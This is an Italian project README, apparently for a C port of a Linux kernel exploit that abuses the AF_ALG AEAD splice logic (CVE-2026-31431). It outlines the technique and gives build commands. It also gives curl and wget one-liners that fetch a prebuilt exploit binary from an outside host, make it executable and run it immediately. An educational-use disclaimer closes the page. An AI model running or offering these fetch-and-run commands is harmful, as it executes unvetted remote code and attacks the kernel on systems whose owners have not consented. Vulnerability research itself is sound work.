
Porting in C di un proof-of-concept che sfrutta un difetto nella logica splice AEAD AF_ALG del kernel Linux (CVE-2026-31431) per ricerca educativa.
Questo progetto è una porting in C del prototipo originale in Python, di offsecguy.
Sfrutta l'API crypto del kernel Linux (AF_ALG) utilizzando:
authencesn(hmac(sha256),cbc(aes))MSG_MOREsplice()La tecnica alimenta i dati da un descrittore di file di sola lettura attraverso un socket crypto, elaborandoli blocco per blocco.
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz
gcc exp.c -o exp -lz -s -static
gcc exp.c -o exp -lz -s
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp
AF_ALGzlib per la decompressioneQuesto codice è fornito solo a scopo educativo e di ricerca.
Usalo in modo responsabile e solo su sistemi che sei autorizzato a testare.